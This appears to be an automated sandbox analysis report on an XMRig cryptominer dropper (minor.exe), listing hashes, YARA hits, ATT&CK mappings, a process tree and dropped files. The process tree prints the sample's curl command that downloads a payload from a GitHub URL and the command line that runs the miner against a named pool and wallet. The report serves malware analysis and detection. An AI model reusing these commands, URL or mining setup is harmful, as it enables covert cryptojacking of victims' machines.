xmrig | 621653b282a1a643b740a8cb9e0233f3b96dd88c41fd57343897bbff03a05e7b

General

Target

minor.exe
Size

5.3MB
MD5

37e7d6a24bd3d91ea805c2e7a18d851e
SHA1

911074791833525c45f5accfeb1f799bbd08d285
SHA256

621653b282a1a643b740a8cb9e0233f3b96dd88c41fd57343897bbff03a05e7b
SHA512

3b31f8602978b0feb615dd2429a9760fef6156e91fe05dfcdf4e9c96236c4a5562981a583bfee023211461bfbeca79488a99e005d6904ab46ce214ac586c9562
SSDEEP

98304:WE5ExC3hEqwkgp7gRgr39WU9gtcYuivV+jtXZuMgngaKl:D8pZr39T9ScYF8buu9

Score

10^/10

xmrig miner

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/files/0x000a0000000232b9-27.dat	family_xmrig
behavioral1/files/0x000a0000000232b9-27.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
3292	minor.exe
4256	driver.exe

Loads dropped DLL 4 IoCs

pid	Process
3292	minor.exe
3292	minor.exe
3292	minor.exe
3292	minor.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
13	raw.githubusercontent.com
14	raw.githubusercontent.com

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	4256	driver.exe
Token: SeLockMemoryPrivilege	4256	driver.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4256	driver.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 3368 wrote to memory of 3292	3368	minor.exe	85
PID 3368 wrote to memory of 3292	3368	minor.exe	85
PID 3292 wrote to memory of 4388	3292	minor.exe	86
PID 3292 wrote to memory of 4388	3292	minor.exe	86
PID 4388 wrote to memory of 4756	4388	cmd.exe	87
PID 4388 wrote to memory of 4756	4388	cmd.exe	87
PID 3292 wrote to memory of 4520	3292	minor.exe	100
PID 3292 wrote to memory of 4520	3292	minor.exe	100
PID 4520 wrote to memory of 4256	4520	cmd.exe	101
PID 4520 wrote to memory of 4256	4520	cmd.exe	101

C:\Users\Admin\AppData\Local\Temp\minor.exe
"C:\Users\Admin\AppData\Local\Temp\minor.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3368
- C:\Users\Admin\AppData\Local\Temp\onefile_3368_133582691964781031\minor.exe
  "C:\Users\Admin\AppData\Local\Temp\minor.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl -L -k https://github.com/mzusi/m/raw/main/SoundDriver.exe -o driver.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4388
  - - C:\Windows\system32\curl.exe
      curl -L -k https://github.com/mzusi/m/raw/main/SoundDriver.exe -o driver.exe
      4⤵
      PID:4756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\driver.exe" --donate-level 1 --max-cpu-usage 85 -o pool.hashvault.pro:3333 -u 46ZMzz8br9seCKvP1xjQFWQkhYQQpjTvZKwFJ7NUFPWNZim5v1kpD7F2jPCpzpXKqV7ifmeM9kMPQcH8iJXmEKdrDiuBViq -p minor -k"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4520
  - - C:\Users\Admin\AppData\Local\Temp\driver.exe
      "C:\Users\Admin\AppData\Local\Temp\driver.exe" --donate-level 1 --max-cpu-usage 85 -o pool.hashvault.pro:3333 -u 46ZMzz8br9seCKvP1xjQFWQkhYQQpjTvZKwFJ7NUFPWNZim5v1kpD7F2jPCpzpXKqV7ifmeM9kMPQcH8iJXmEKdrDiuBViq -p minor -k
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:4256

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\driver.exe

Filesize
5.1MB

MD5
99aa369598e5d8eba59b7d0f0a8429f9

SHA1
7baaf6546112049038e4c62143ce7dd77c3a97c9

SHA256
8174ccc5cfae43503648608ba6ae14b00679517591a2cdff9017c4be2ab2996b

SHA512
3fdb8674033d6736bb548c262f54e1277c196fb83c3bfcc6dbe9b8bb126fb3f8404b6385f666b389e5ea84ab7261bcb65dddd88e39c53d3d0e6813dd9212c62f

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3368_133582691964781031\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3368_133582691964781031\_bz2.pyd

Filesize
81KB

MD5
4101128e19134a4733028cfaafc2f3bb

SHA1
66c18b0406201c3cfbba6e239ab9ee3dbb3be07d

SHA256
5843872d5e2b08f138a71fe9ba94813afee59c8b48166d4a8eb0f606107a7e80

SHA512
4f2fc415026d7fd71c5018bc2ffdf37a5b835a417b9e5017261849e36d65375715bae148ce8f9649f9d807a63ac09d0fb270e4abae83dfa371d129953a5422ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3368_133582691964781031\_lzma.pyd

Filesize
154KB

MD5
337b0e65a856568778e25660f77bc80a

SHA1
4d9e921feaee5fa70181eba99054ffa7b6c9bb3f

SHA256
613de58e4a9a80eff8f8bc45c350a6eaebf89f85ffd2d7e3b0b266bf0888a60a

SHA512
19e6da02d9d25ccef06c843b9f429e6b598667270631febe99a0d12fc12d5da4fb242973a8351d3bf169f60d2e17fe821ad692038c793ce69dfb66a42211398e

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3368_133582691964781031\minor.exe

Filesize
6.6MB

MD5
fdbca804bd9a0f8d2ae5fb6a063d8fbd

SHA1
8503fa2b86858e259215a5045adba1e02b57bdce

SHA256
d9479b3ba255cd7e8d283524669baeac88bbaa93239c646541c900edcbd3fb35

SHA512
a56cd90602b6f7fe985419a7a7eb027da4a36bb134f70cecc8c720b9f55421f70407bc81af063b7979c671880ac6303b08f6ca8cc6bd1d4331d28edc6169b4d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_3368_133582691964781031\python311.dll

Filesize
5.5MB

MD5
9a24c8c35e4ac4b1597124c1dcbebe0f

SHA1
f59782a4923a30118b97e01a7f8db69b92d8382a

SHA256
a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7

SHA512
9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

Download Submit
memory/3292-22-0x00007FF61AE00000-0x00007FF61B4AA000-memory.dmp

Filesize
6.7MB

Download
memory/3292-32-0x00007FF61AE00000-0x00007FF61B4AA000-memory.dmp

Filesize
6.7MB

Download
memory/3368-21-0x00007FF7C0490000-0x00007FF7C0A01000-memory.dmp

Filesize
5.4MB

Download
memory/4256-29-0x00000194EFC60000-0x00000194EFC80000-memory.dmp

Filesize
128KB

Download
memory/4256-30-0x00000194EFCA0000-0x00000194EFCC0000-memory.dmp

Filesize
128KB

Download
memory/4256-35-0x00000194EFCE0000-0x00000194EFD00000-memory.dmp

Filesize
128KB

Download
memory/4256-36-0x00000194EFD00000-0x00000194EFD20000-memory.dmp

Filesize
128KB

Download
memory/4256-41-0x00000194EFCE0000-0x00000194EFD00000-memory.dmp

Filesize
128KB

Download
memory/4256-42-0x00000194EFD00000-0x00000194EFD20000-memory.dmp

Filesize
128KB

Download

Analysis

Sharing